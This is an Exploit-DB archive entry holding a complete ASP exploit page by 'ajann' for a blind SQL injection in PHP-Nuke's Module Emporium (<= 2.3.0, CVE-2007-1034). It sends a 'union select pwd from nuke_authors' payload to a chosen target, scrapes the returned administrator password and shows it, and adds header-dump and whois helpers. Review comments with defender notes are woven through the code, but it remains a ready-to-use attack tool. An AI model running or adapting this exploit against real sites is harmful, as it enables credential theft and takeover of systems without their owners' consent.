PHP-Nuke Module Emporium <= 2.3.0 - Remote SQL Injection Exploit

2007-02-19T00:00:00
ID EDB-ID:3334
Type exploitdb
Reporter ajann
Modified 2007-02-19T00:00:00

Description

PHP-Nuke Module Emporium <= 2.3.0 Remote SQL Injection Exploit. CVE-2007-1034. Web application exploit for the PHP platform.

                                        
&lt;% ' Buffer the output: the Response.Redirect calls in the validation step below are issued after markup has already been written, which only works while buffering is on. %&gt;
&lt;% Response.Buffer = True %&gt;
&lt;% ' Page-wide error suppression: failed HTTP requests, missing objects and regex errors further down are silently ignored rather than reported. %&gt;
&lt;% On Error Resume Next %&gt;
&lt;% ' Upper bound (seconds) on the whole page run; it is also the only thing that stops the whois parsing loop when its delimiters are missing. %&gt;
&lt;% Server.ScriptTimeout = 100 %&gt;

&lt;%
'===============================================================================================
'[Script Name: Php-Nuke Module Emporium &lt;= 2.3.0 Remote Blind SQL Injection Exploit
'[Coded by   : ajann
'[Author     : ajann
'[Contact    : :(
'[S.Page     : http://www.burnwave.com/
'[ExploitName: exploit2.asp

'[Note  : exploit file name =&gt;exploit2.asp
'[Update: + Get Header
'[Update: + Get Whois Info
'===============================================================================================

%&gt;

&lt;%

' Page title; also rendered as the heading link at the top of the body.
title="Php-Nuke Module Emporium &lt;= 2.3.0 Remote Blind SQL Injection Exploit" 'Vuln Title

%&gt;
&lt;html&gt;
&lt;title&gt;&lt;% = title %&gt;&lt;/title&gt;
&lt;head&gt;
&lt;meta name="generator" content="Microsoft FrontPage 5.0"&gt;

&lt;script language="JavaScript"&gt;    
  // Schedules the empty-field check two seconds after being called, giving the
  // server-side part of the page time to finish rendering first.
  function functionControl1() {
    window.setTimeout("functionControl2()", 2000);
  }

  // Raises the failure alert when form1's field1 holds an empty string.
  // NOTE(review): the form named form1 on this page contains only text1 and id;
  // field1 is declared in the later form named form2, so document.form1.field1
  // may well be undefined here and this check may never reach the alert.
  function functionControl2() {
    var fieldValue = document.form1.field1.value;
    if (fieldValue == "") {
      alert("[Exploit Failed]=&gt;The Username and Password Didnt Take,Try Again");
    }
  }

  // Writes the "data didn't take" notice into the htmlAlani div when field1 is empty
  // (same form1/field1 lookup caveat as functionControl2).
  function writetext() {
    var fieldValue = document.form1.field1.value;
    if (fieldValue == "") {
      document.getElementById('htmlAlani').innerHTML = '&lt;font face=\"Verdana\" size=\"1\" color=\"#008000\"&gt;There is a problem... The Data Didn\'t Take &lt;/font&gt;';
    }
  }

  // Runs writetext one second after being called.
  function write() {
    window.setTimeout("writetext()", 1000);
  }
  
&lt;/script&gt;


&lt;/head&gt;
&lt;body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000"&gt;

&lt;center&gt;
&lt;font face="Verdana" size="2" color="#008000"&gt;&lt;b&gt;&lt;a href="exploit2.asp"&gt;&lt;u&gt;&lt;% = title %&gt;
&lt;/b&gt;&lt;/u&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;&lt;br&gt;
&lt;table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080"&gt;
  &lt;tr&gt;
    &lt;td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"&gt;
    &lt;font face="Arial" size="1"&gt;&lt;b&gt;&lt;font color="#FFFFFF"&gt;TARGET:&lt;/font&gt;Example:[http://x.com/path]&lt;/b&gt;&lt;/font&gt;&lt;p&gt;
    &lt;b&gt;&lt;font face="Arial" size="1" color="#FFFFFF"&gt;USER ID:&lt;/font&gt;&lt;/b&gt;&lt;font face="Arial" size="1"&gt;&lt;b&gt;Example:[User 
    ID=1]&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
  &lt;/td&gt;
    &lt;td width="50%"&gt;
 &lt;center&gt;
&lt;form method="post" name="form1" action="exploit2.asp?islem=get"&gt;
&lt;input type="text" name="text1" value="http://" size="25" style="background-color: #808080"&gt;&lt;br&gt;&lt;input type="text" name="id" value="1" size="25" style="background-color: #808080"&gt;
&lt;input type="submit" value="Get"&gt;&lt;/form&gt;&lt;/center&gt;&lt;/td&gt;
  &lt;/tr&gt;

&lt;/table&gt;

&lt;div id=htmlAlani&gt;&lt;/div&gt;

&lt;%
' Action selector from the query string. The validation step in the "get"
' branch redirects back to this page with islem=hataN to report a form error.
islem = Request.QueryString("islem")

' At most one code can match, so a single Select Case reads the same as the
' four separate If blocks (both use binary string comparison).
Select Case islem
    Case "hata1"
        Response.Write "&lt;font face=""Verdana"" size=""1"" color=""#008000""&gt;There is a problem! Please complete to the whole spaces&lt;/font&gt;"
    Case "hata2"
        Response.Write "&lt;font face=""Verdana"" size=""1"" color=""#008000""&gt;There is a problem! Please right character use&lt;/font&gt;"
    Case "hata3"
        Response.Write "&lt;font face=""Verdana"" size=""1"" color=""#008000""&gt;There is a problem! Add ""http://""&lt;/font&gt;"
    Case "hata4"
        Response.Write "&lt;font face=""Verdana"" size=""1"" color=""#008000""&gt;There is a problem! Just Numeric Character!&lt;/font&gt;"
End Select

%&gt;

&lt;%  
' ---- Action "get": validate the form, then build the injection request ----
' The If/Else chain opened here runs across several &lt;% %&gt; blocks and the
' HTML between them; it is closed by the run of End If statements near the
' end of the page.

If islem = "get" Then

id= Request.Form("id")

' Vulnerable path and the injected value for its category_id parameter.
' The payload presupposes that category_id reaches the SQL query without an
' integer cast; it selects the pwd column of nuke_authors rows with radminsuper=1.
' Defender note: casting category_id to an integer (or using a prepared
' statement) on the server removes the injection point, and "union select"
' appearing in a category_id parameter is a usable log/WAF signature.
file="modules.php?name=Shopping_Cart&file=category&category_id="
sql="1/1%20union%20select%200,pwd,0%20from%20nuke_authors%20where%20radminsuper=1/*"


idform = Request.Form("id")
targettext = Request.Form("text1")
' Case-insensitive (compare mode 1) searches of the submitted target URL.
arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1)

' Empty target -&gt; hata1
If targettext="" Then
Response.Redirect("exploit2.asp?islem=hata1")

Else
' Target text already containing "union" -&gt; hata2 (the payload is appended
' below from the sql constant, not typed by the user).
If arama&gt;0 then 
Response.Redirect("exploit2.asp?islem=hata2")

Else
' No "http://" anywhere in the target -&gt; hata3
If arama2=0 then 
Response.Redirect("exploit2.asp?islem=hata3")

Else
' Non-numeric id -&gt; hata4.
' NOTE(review): id/idform are validated but never used afterwards; the
' request URL built below is targettext+file+sql and does not include them.
IF Not IsNumeric(idform) Then
Response.Redirect("exploit2.asp?islem=hata4")

Else
%&gt; 

&lt;%

' Full URL of the injected request: user-supplied target + vulnerable path + payload.
target1 = targettext+file+sql

' Fetches a URL with a synchronous GET through Microsoft.XMLHTTP and returns
' the response body as text. Because of On Error Resume Next, a failed
' request leaves the return value unset instead of raising an error.
' ".sEnd" is the Send method (VBScript member names are case-insensitive).
Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
  .Open "GET" , come, FALSE
  .sEnd
  
take =  .Responsetext
End With
SET objtake = Nothing
End Function


' NOTE(review): the same URL is requested twice (here and into metin below);
' both requests carry the payload and only metin is parsed.
get_username = take(target1)

' NOTE(review): getdata and username are computed but never used afterwards.
getdata=InStr(get_username,"0  0/" )
username=Mid(get_username,getdata+5,90)

Dim metin
metin = take(target1)  

Dim objReg
Set objReg = New RegExp
objReg.Global = True
objReg.IgnoreCase = True

' Global, case-insensitive match of 0"&gt;&lt;b&gt;…&lt;/b&gt; in the page body;
' presumably where the selected pwd column is rendered by the target page.
' The "ý" inside the character class looks like an encoding artefact of a
' Turkish letter rather than an intentional match — confirm against the original.
objReg.Pattern = "0""&gt;&lt;b&gt;[A-Za-z0-9ý]+&lt;/b&gt;"
' istediginString is declared but never used.
Dim calistir, istediginString
Set calistir = objReg.Execute(metin)


If calistir.Count = 0 Then
     Response.write "Not True"
Else
      ' Strip the surrounding markup from the first match.
      ' NOTE(review): basusername is remote-controlled content and is later
      ' written into the page unescaped (&lt;%=basusername%&gt;); a hostile target
      ' can inject markup into this tool's own output. Server.HTMLEncode at the
      ' point of output would neutralise that.
      basusername = Replace(calistir.Item(0), "0""&gt;&lt;b&gt;" , "" )
      basusername = Replace(basusername, "&lt;/b&gt;" , "" )


End If  


 
' NOTE(review): bulunanlar is never assigned anywhere on the page; this Set
' only passes because of On Error Resume Next.
Set bulunanlar = Nothing
Set objReg = Nothing

%&gt;

&lt;center&gt;
&lt;font face="Verdana" size="2" color="#008000"&gt; &lt;u&gt;&lt;b&gt;
ajann&lt;br&gt;&lt;/b&gt;&lt;/u&gt;&lt;/font&gt;&lt;br&gt;

&lt;table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080"&gt;
  &lt;tr&gt;
    &lt;td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"&gt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
    &lt;b&gt;&lt;font size="2" face="Arial"&gt;Password Admin:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
    &lt;td width="80%"&gt;
&nbsp;&lt;b&gt;&lt;font color="#C0C0C0" size="2" face="Verdana"&gt;&lt;%=basusername%&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/td&gt;
  &lt;/tr&gt;


&lt;/table&gt;
&lt;/center&gt; 

  &lt;br&gt;


&lt;%
' ---- Header dump: plain GET of the user-supplied target URL ----
' NOTE(review): hedef is whatever the form submitted, checked only for an
' "http://" substring and the absence of "union". Any host serving this page
' therefore issues server-side requests to arbitrary URLs chosen by the
' browser user and echoes the remote headers back.
hedef = targettext
Dim objem
Set objem = Server.CreateObject("MSXML2.ServerXMLHTTP")
objem.Open "GET" , hedef , false

objem.sEnd

' strHTML is fetched but never used below.
strHTML = objem.ResponseText

' Raw response headers from the remote host, echoed into the page without
' Server.HTMLEncode (same remote-content-in-markup concern as the password field).
header=objem.getallResponseheaders()
Response.Write "&lt;center&gt;"
Response.Write "&lt;b&gt;"
' "Header Bilgileri" is Turkish UI text ("Header information").
Response.Write "&lt;p&gt;&lt;font color=""#008000"" face=""Verdana"" size=""2""&gt;Header Bilgileri&lt;/font&gt;&lt;/p&gt;"
Response.Write "&lt;/b&gt;"
Response.Write "&lt;p&gt;&lt;font color=""#008000"" face=""Verdana"" size=""2""&gt;" & header & "&lt;/font&gt;&lt;/p&gt;"
Response.Write "&lt;p&gt;&lt;font color=""#008000"" face=""Verdana"" size=""2""&gt;&lt;b&gt;Whois&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;"
' The "[google.com]" value here is a fixed literal; the actual lookup is done
' by the whois form that follows this block.
Response.Write "&lt;p&gt;&lt;font size=""2"" color=""#008000""&gt;Site:&lt;/font&gt;&lt;font color=""#008000"" size=""1""&gt;[google.com]&lt;/font&gt;&lt;/p&gt;"
Response.Write "&lt;/center&gt;"
Set objem=Nothing

%&gt;

&lt;center&gt;&lt;form method="post" name="form2" action="exploit2.asp?islem=whois"&gt;
  &lt;p&gt;
  &lt;input type="text" name="whoissite" size="20" value="domainwhois" style="font-family: Verdana; font-size: 10pt; color: #008000; border: 1px dashed #008000; background-color: #000000"&gt;
  &lt;input type="submit" value="Yolla" name="B1"&gt;&lt;/p&gt;
&lt;/form&gt;&lt;/center&gt;

     
&lt;br&gt;


&lt;form method="POST" name="form2" action="#"&gt;    
&lt;input type="hidden" name="field1" size="20" value="sdfsd"&gt;     
&lt;/form&gt; 


&lt;script language="JavaScript"&gt;
write()
functionControl1()
&lt;/script&gt;

&lt;/b&gt;&lt;/font&gt;

&lt;/body&gt;
&lt;/html&gt;

&lt;%
' Closes the "get" branch chain, innermost first:
' IsNumeric(idform), arama2=0, arama&gt;0, targettext="", then If islem = "get".
End If
End If
End If
End If
End If

%&gt;


&lt;%
' ---- Action "whois": look the submitted name up at internic and extract its &lt;pre&gt; block ----
If islem = "whois" Then
' NOTE(review): whoissite is concatenated into the query string without
' Server.URLEncode, so reserved characters in the input ("&amp;", spaces, …)
' change the request sent to reports.internic.net.
site = Request.Form("whoissite")
target1 = "http://reports.internic.net/cgi/whois?whois_nic=" & site & "&type=domain"

' Same helper as in the "get" branch: synchronous GET, body returned as text.
' NOTE(review): VBScript procedures are page-scoped rather than block-scoped,
' so this is a second definition of take on the same page — confirm the
' engine accepts the redefinition.
Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
  .Open "GET" , come, FALSE
  .sEnd
take =  .Responsetext
End With
Set objtake = Nothing
End Function

remoteadres=take(target1)

' Character-by-character scan for the text between the first "&lt;pre&gt;" and the
' following "&lt;/pre&gt;". abc counts delimiters seen: 0 = before the opening tag,
' 1 = inside, 2 = done. The opening tag's own characters after "&lt;" are copied
' too, so sonuc begins with "pre&gt;" — which is why the output step prefixes "&lt;".
dim baslangic , bitis
baslangic = "&lt;pre&gt;"
bitis = "&lt;/pre&gt;"
dim x , abc
x = 0
abc = 0
dim sonuc
sonuc = ""

' NOTE(review): if either delimiter is absent (or the request failed and
' remoteadres is empty), Mid keeps returning "" past the end of the string,
' abc never reaches 2 and this loop spins until Server.ScriptTimeout.
' Adding "Or x &gt; Len(remoteadres)" to the Until condition would bound it.
Do Until abc = 2
x = x + 1
If Mid(remoteadres,x,Len(bitis)) = bitis and abc = 1 Then
abc = abc + 1
End If
If Mid(remoteadres,x,Len(baslangic)) = baslangic Then
abc = abc + 1
Else
If abc = 1 Then
sonuc = sonuc + Mid(remoteadres,x,1)
End If
End If
Loop

' objtake is local to take(); this Set has no effect at page scope.
' NOTE(review): sonuc is later written unescaped into a &lt;textarea&gt;; a
' "&lt;/textarea&gt;" in the whois reply would break out of it.
Set objtake=Nothing
 
%&gt;

&lt;center&gt;
&lt;b&gt;&lt;font color="#008000" face="Verdana" size="2"&gt;Whois Bilgileri&lt;/font&gt;&lt;/b&gt;&lt;p&gt;
&lt;textarea rows="20" name="S1" cols="68" style="font-family: Verdana; font-size: 10pt; color: #008000; border: 1px dotted #008000; background-color: #000000"&gt;
&lt;% Response.Write "&lt;" & sonuc %&gt;
&lt;/textarea&gt;
&lt;/p&gt;
&lt;/center&gt;

&lt;center&gt;&lt;form method="post" name="form2" action="exploit2.asp?islem=whois"&gt;
  &lt;p&gt;
  &lt;input type="text" name="whoissite" size="20" value="domainwhois" style="font-family: Verdana; font-size: 10pt; color: #008000; border: 1px dashed #008000; background-color: #000000"&gt;
  &lt;input type="submit" value="Yolla" name="B1"&gt;&lt;/p&gt;
&lt;/form&gt;&lt;/center&gt;



&lt;%
' Closes If islem = "whois".
End If
%&gt;

&lt;%
' Static footer emitted on every request: a Turkish "best viewed at 1152x864
' resolution with Firefox" notice followed by the author credit. The markup
' is assembled into one string and written once; the bytes sent are the same
' as writing each fragment separately.
Dim footerHtml
footerHtml = "&lt;br&gt;" & "&lt;center&gt;"

' First &lt;pre&gt;: resolution / browser notice.
footerHtml = footerHtml & "&lt;pre class=""info""&gt;"
footerHtml = footerHtml & "&lt;font color=""#C0C0C0"" size=""1""&gt;" & "En iyi " & "&lt;/font&gt;"
footerHtml = footerHtml & "&lt;font size=""1"" color=""#808080""&gt;&lt;span class=""info2""&gt;" & "1152x864 " & "&lt;/span&gt;&lt;/font&gt;"
footerHtml = footerHtml & "&lt;font color=""#C0C0C0"" size=""1""&gt;çözünürlük ve "
footerHtml = footerHtml & "&lt;span class=""info2""&gt;&lt;font size=""1"" color=""#808080""&gt;Firefox &lt;/font&gt;&lt;/span&gt;"
footerHtml = footerHtml & "ile görüntülünebilir.&lt;/font&gt;&lt;/pre&gt;"

' Second &lt;pre&gt;: author credit.
footerHtml = footerHtml & "&lt;pre class=""info""&gt;"
footerHtml = footerHtml & "&lt;font color=""#C0C0C0"" size=""1""&gt;" & "Exploit coded by " & "&lt;/font&gt;"
footerHtml = footerHtml & "&lt;font size=""1"" color=""#808080""&gt;&lt;span class=""info2""&gt;" & "ajann" & "&lt;/span&gt;&lt;/font&gt;"
footerHtml = footerHtml & "&lt;/center&gt;"

Response.Write footerHtml

%&gt;

# milw0rm.com [2007-02-19]